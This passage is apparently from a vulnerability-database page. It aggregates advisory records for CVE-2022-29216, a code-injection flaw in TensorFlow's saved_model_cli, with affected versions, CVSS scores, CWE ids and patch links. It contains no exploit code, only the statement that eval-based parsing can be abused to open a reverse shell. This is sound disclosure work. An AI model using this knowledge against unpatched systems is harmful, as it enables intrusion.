\"https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\", \"name\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\", \"refsource\": \"MISC\"}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\", \"name\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\", \"refsource\": \"MISC\"}, {\"url\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\", \"name\": \"https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\", \"refsource\": \"MISC\"}, {\"url\": \"https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc\", \"name\": \"https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc\", \"refsource\": \"CONFIRM\"}, {\"url\": \"https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac\", \"name\": \"https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac\", \"refsource\": \"MISC\"}, {\"url\": \"https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574\", \"name\": \"https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574\", \"refsource\": \"MISC\"}]}, \"data_format\": \"MITRE\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.\"}]}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}]}, \"data_version\": \"4.0\", \"CVE_data_meta\": {\"ID\": \"CVE-2022-29216\", \"STATE\": \"PUBLIC\", \"TITLE\": \"Code injection in `saved_model_cli` in TensorFlow\", \"ASSIGNER\": \"security-advisories@github.com\"}}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2022-29216\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-04-22T17:56:38.650Z\", \"dateReserved\": \"2022-04-13T00:00:00.000Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2022-05-20T23:35:13.000Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

gsd-2022-29216

Vulnerability from gsd

Modified

2023-12-13 01:19

Details

Aliases

CVE-2022-29216

Aliases

CVE-2022-29216

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2022-29216",
    "description": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.",
    "id": "GSD-2022-29216",
    "references": [
      "https://www.suse.com/security/cve/CVE-2022-29216.html"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2022-29216"
      ],
      "details": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.",
      "id": "GSD-2022-29216",
      "modified": "2023-12-13T01:19:41.764831Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2022-29216",
        "STATE": "PUBLIC",
        "TITLE": "Code injection in `saved_model_cli` in TensorFlow"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "tensorflow",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "\u003c 2.6.4"
                        },
                        {
                          "version_value": "\u003e= 2.7.0rc0, \u003c 2.7.2"
                        },
                        {
                          "version_value": "\u003e= 2.8.0rc0, \u003c 2.8.1"
                        },
                        {
                          "version_value": "\u003e= 2.9.0rc0, \u003c 2.9.0"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "tensorflow"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4."
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7",
            "refsource": "MISC",
            "url": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"
          },
          {
            "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4",
            "refsource": "MISC",
            "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4"
          },
          {
            "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2",
            "refsource": "MISC",
            "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2"
          },
          {
            "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1",
            "refsource": "MISC",
            "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1"
          },
          {
            "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0",
            "refsource": "MISC",
            "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0"
          },
          {
            "name": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc",
            "refsource": "CONFIRM",
            "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc"
          },
          {
            "name": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac",
            "refsource": "MISC",
            "url": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac"
          },
          {
            "name": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574",
            "refsource": "MISC",
            "url": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-75c9-jrh4-79mc",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c2.6.4||\u003e=2.7.0,\u003c2.7.2||\u003e=2.8.0,\u003c2.8.1",
          "affected_versions": "All versions before 2.6.4, all versions starting from 2.7.0 before 2.7.2, all versions starting from 2.8.0 before 2.8.1",
          "cwe_ids": [
            "CWE-1035",
            "CWE-78",
            "CWE-937",
            "CWE-94"
          ],
          "date": "2022-05-24",
          "description": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.",
          "fixed_versions": [
            "2.6.4",
            "2.7.2",
            "2.8.1"
          ],
          "identifier": "CVE-2022-29216",
          "identifiers": [
            "GHSA-75c9-jrh4-79mc",
            "CVE-2022-29216"
          ],
          "not_impacted": "All versions starting from 2.6.4 before 2.7.0, all versions starting from 2.7.2 before 2.8.0, all versions starting from 2.8.1",
          "package_slug": "pypi/tensorflow-cpu",
          "pubdate": "2022-05-24",
          "solution": "Upgrade to versions 2.6.4, 2.7.2, 2.8.1 or above.",
          "title": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
          "urls": [
            "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc",
            "https://nvd.nist.gov/vuln/detail/CVE-2022-29216",
            "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7",
            "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac",
            "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0",
            "https://github.com/advisories/GHSA-75c9-jrh4-79mc"
          ],
          "uuid": "846a6c14-7284-47ae-b684-52a7cdb949ac"
        },
        {
          "affected_range": "\u003c2.6.4||\u003e=2.7.0,\u003c2.7.2||\u003e=2.8.0,\u003c2.8.1",
          "affected_versions": "All versions before 2.6.4, all versions starting from 2.7.0 before 2.7.2, all versions starting from 2.8.0 before 2.8.1",
          "cwe_ids": [
            "CWE-1035",
            "CWE-78",
            "CWE-937",
            "CWE-94"
          ],
          "date": "2022-05-24",
          "description": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.",
          "fixed_versions": [
            "2.6.4",
            "2.7.2",
            "2.8.1"
          ],
          "identifier": "CVE-2022-29216",
          "identifiers": [
            "GHSA-75c9-jrh4-79mc",
            "CVE-2022-29216"
          ],
          "not_impacted": "All versions starting from 2.6.4 before 2.7.0, all versions starting from 2.7.2 before 2.8.0, all versions starting from 2.8.1",
          "package_slug": "pypi/tensorflow-gpu",
          "pubdate": "2022-05-24",
          "solution": "Upgrade to versions 2.6.4, 2.7.2, 2.8.1 or above.",
          "title": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
          "urls": [
            "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc",
            "https://nvd.nist.gov/vuln/detail/CVE-2022-29216",
            "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7",
            "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac",
            "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0",
            "https://github.com/advisories/GHSA-75c9-jrh4-79mc"
          ],
          "uuid": "ebb50341-59ba-44b0-a79e-2af208321c66"
        },
        {
          "affected_range": "\u003c2.6.4||\u003e=2.7.0,\u003c2.7.2||\u003e=2.8.0,\u003c2.8.1",
          "affected_versions": "All versions before 2.6.4, all versions starting from 2.7.0 before 2.7.2, all versions starting from 2.8.0 before 2.8.1",
          "cvss_v2": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
          "cvss_v3": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "cwe_ids": [
            "CWE-1035",
            "CWE-78",
            "CWE-937",
            "CWE-94"
          ],
          "date": "2022-06-03",
          "description": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.",
          "fixed_versions": [
            "2.6.4",
            "2.7.2",
            "2.8.1"
          ],
          "identifier": "CVE-2022-29216",
          "identifiers": [
            "CVE-2022-29216",
            "GHSA-75c9-jrh4-79mc"
          ],
          "not_impacted": "All versions starting from 2.6.4 before 2.7.0, all versions starting from 2.7.2 before 2.8.0, all versions starting from 2.8.1",
          "package_slug": "pypi/tensorflow",
          "pubdate": "2022-05-21",
          "solution": "Upgrade to versions 2.6.4, 2.7.2, 2.8.1 or above.",
          "title": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
          "urls": [
            "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc",
            "https://nvd.nist.gov/vuln/detail/CVE-2022-29216",
            "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7",
            "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac",
            "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1",
            "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0",
            "https://github.com/advisories/GHSA-75c9-jrh4-79mc"
          ],
          "uuid": "ce2ff5a1-371e-4002-b1e4-a3505da2531d"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:2.7.0:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:2.7.0:rc0:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.7.2",
                "versionStartIncluding": "2.7.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "2.6.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:2.8.0:rc0:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:2.8.0:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:2.9.0:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:2.9.0:rc0:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:google:tensorflow:2.8.0:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2022-29216"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-94"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4",
              "refsource": "MISC",
              "tags": [
                "Release Notes",
                "Third Party Advisory"
              ],
              "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2",
              "refsource": "MISC",
              "tags": [
                "Release Notes",
                "Third Party Advisory"
              ],
              "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1",
              "refsource": "MISC",
              "tags": [
                "Release Notes",
                "Third Party Advisory"
              ],
              "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0",
              "refsource": "MISC",
              "tags": [
                "Release Notes",
                "Third Party Advisory"
              ],
              "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0"
            },
            {
              "name": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2022-06-03T02:47Z",
      "publishedDate": "2022-05-21T00:15Z"
    }
  }
}

fkie_cve-2022-29216

Vulnerability from fkie_nvd

Published

2022-05-21 00:15

Modified

2024-11-21 06:58

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574	Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7	Patch, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac	Patch, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0	Release Notes, Third Party Advisory
security-advisories@github.com	https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc	Exploit, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7	Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac	Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0	Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc	Exploit, Patch, Third Party Advisory

Impacted products

Vendor	Product	Version
google	tensorflow	*
google	tensorflow	*
google	tensorflow	2.7.0
google	tensorflow	2.7.0
google	tensorflow	2.8.0
google	tensorflow	2.8.0
google	tensorflow	2.8.0
google	tensorflow	2.9.0
google	tensorflow	2.9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9359D32-D090-44CF-AC43-2046084A28BB",
              "versionEndExcluding": "2.6.4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4DFBF2D-5283-42F6-8800-D653BFA5CE82",
              "versionEndExcluding": "2.7.2",
              "versionStartIncluding": "2.7.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc0:*:*:*:*:*:*",
              "matchCriteriaId": "A58EDA5C-66D6-46F1-962E-60AFB7C784A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:google:tensorflow:2.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "89522760-C2DF-400D-9624-626D8F160CBA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:google:tensorflow:2.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E9EA1898-ACAA-4699-8BAE-54D62C1819FB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:google:tensorflow:2.8.0:rc0:*:*:*:*:*:*",
              "matchCriteriaId": "130DE3C9-6842-456F-A259-BF8FF8457217",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:google:tensorflow:2.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BBF2FCEF-989C-409D-9F4C-81418C65B972",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:google:tensorflow:2.9.0:rc0:*:*:*:*:*:*",
              "matchCriteriaId": "9CFB1CFC-579D-4647-A472-6DE8BE1951DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:google:tensorflow:2.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3F3F37E-D27F-4060-830C-0AFF16150777",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, TensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection. This can be used to open a reverse shell. This code path was maintained for compatibility reasons as the maintainers had several test cases where numpy expressions were used as arguments. However, given that the tool is always run manually, the impact of this is still not severe. The maintainers have now removed the `safe=False` argument, so all parsing is done without calling `eval`. The patch is available in versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4."
    },
    {
      "lang": "es",
      "value": "TensorFlow es una plataforma de c\u00f3digo abierto para el aprendizaje autom\u00e1tico. En versiones anteriores a 2.9.0, 2.8.1, 2.7.2 y 2.6.4, la herramienta \"saved_model_cli\" de TensorFlow es vulnerable a una inyecci\u00f3n de c\u00f3digo. Esto puede ser usado para abrir un shell inverso. Esta ruta de c\u00f3digo fue mantenida por razones de compatibilidad, ya que los mantenedores ten\u00edan varios casos de prueba en los que eran usadas expresiones numpy como argumentos. Sin embargo, dado que la herramienta siempre es ejecutada manualmente, el impacto de esto no es grave. Los mantenedores han eliminado el argumento \"safe=False\", por lo que todo el an\u00e1lisis sea realizado sin llamar a \"eval\". El parche est\u00e1 disponible en las versiones 2.9.0, 2.8.1, 2.7.2 y 2.6.4"
    }
  ],
  "id": "CVE-2022-29216",
  "lastModified": "2024-11-21T06:58:44.327",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.6,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
